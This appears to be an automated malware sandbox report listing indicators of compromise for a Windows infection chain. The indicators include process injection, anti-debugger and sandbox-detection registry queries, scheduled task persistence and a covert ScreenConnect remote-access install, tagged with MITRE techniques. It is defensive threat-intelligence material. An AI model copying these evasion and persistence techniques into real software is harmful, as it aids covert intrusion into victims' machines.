File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\frw5u5n1.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\frw5u5n1.newcfg	ScreenConnect.ClientService.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs

pid	Process
2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2808	skotes.exe
2280	MAl7pjE.exe
1620	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
2504	52206648a6.exe
272	f29907a492.exe
1744	483d2fa8a0d53818306efeb32d3.exe
2292	db484a9c5c.exe
816	MAl7pjE.exe
1464	aca90f55db.exe
2604	372485f12e.exe
2004	5782e13f6e.exe
1784	2b8d02974d.exe
2032	3d2e5da9a6.exe
2672	1b80ca21fe.exe
2500	716ddbb44f.exe
784	Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
3912	d9b3cb7467.exe
3436	ae7650820a.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 1776 set thread context of 3004	1776	7aencsM.exe	84
PID 2176 set thread context of 988	2176	monthdragon.exe	94
PID 1696 set thread context of 2548	1696	Bjkm5hE.exe	98
PID 1296 set thread context of 1628	1296	f3Ypd8O.exe	101
PID 2176 set thread context of 1572	2176	NL58452.exe	106
PID 2032 set thread context of 556	2032	3d2e5da9a6.exe	133
PID 3116 set thread context of 4140	3116	fd81d29568.exe	177
PID 3912 set thread context of 4296	3912	d9b3cb7467.exe	178
PID 3436 set thread context of 4396	3436	ae7650820a.exe	179

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a00000001a4fd-624.dat	upx
behavioral1/memory/596-632-0x0000000000960000-0x0000000001C22000-memory.dmp	upx

Drops file in Program Files directory 17 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\system.config	msiexec.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\Installer\f76fe4c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon	msiexec.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File created	C:\Windows\Tasks\skotes.job	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
File opened for modification	C:\Windows\Installer\MSI706.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{E7FFB52F-03E7-9BA2-D37A-094243CEF563}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon	msiexec.exe
File created	C:\Windows\Installer\f76fe4c.msi	msiexec.exe
File created	C:\Windows\Installer\f76fe4d.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI129.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI12A.tmp	msiexec.exe
File created	C:\Windows\Installer\f76fe4f.msi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\f76fe4d.ipi	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
1488	272	WerFault.exe	74
344	1776	WerFault.exe	83
272	2176	WerFault.exe	91
2984	1696	WerFault.exe	97
580	1296	WerFault.exe	100
2032	2176	WerFault.exe	105
3776	2604	WerFault.exe	109

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ae7650820a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f29907a492.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fd81d29568.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	372485f12e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a1EoH8b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3d2e5da9a6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	c139e4b71c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cd7bf9405c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c139e4b71c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	716ddbb44f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apisysDirectx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sQ3DZPU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7be12f2342.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apisysDirectx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apisysDirectx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1b80ca21fe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	52206648a6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aca90f55db.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	db484a9c5c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3e0505c684.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sQ3DZPU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5782e13f6e.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	f29907a492.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	f29907a492.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	372485f12e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	372485f12e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
600	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 5 IoCs

pid	Process
3244	taskkill.exe
916	taskkill.exe
344	taskkill.exe
308	taskkill.exe
3180	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe

Modifies registry class 38 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Version = "402849799"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\ = "ScreenConnect Client (91b7d375130f294a) Credential Provider"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\PackageCode = "F25BFF7E7E302AB93DA7902434EC5F36"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductName = "ScreenConnect Client (91b7d375130f294a)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4\F25BFF7E7E302AB93DA7902434EC5F36	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\UseOriginalUrlEncoding = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36\Full	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\DeploymentFlags = "3"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductIcon = "C:\\Windows\\Installer\\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\\DefaultIcon"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a	msiexec.exe
